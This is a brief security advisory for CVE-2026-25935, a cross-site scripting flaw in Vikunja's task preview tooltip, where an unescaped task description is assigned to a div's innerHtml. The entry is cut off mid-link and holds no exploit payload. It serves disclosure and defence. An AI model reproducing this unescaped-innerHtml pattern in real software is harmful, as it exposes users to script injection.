CVE-2026-25935 [HIGH] CWE-79: Vikunja Vulnerable to XSS Via Task Preview. Summary: The task preview component creates an unparented div. The div's `innerHtml` is set to the unescaped description of the task. Details: In `TaskGlanceTooltip.vue`, it temporarily creates a div and sets its `innerHtml` to the description [here](https://github.com/go-vikunja/vikunja/blob/cdca79032526966cb248b72bddcf2a0f888c8a8f/frontend/src/components/tasks/partials/Ta
Sources: GHSA, OSV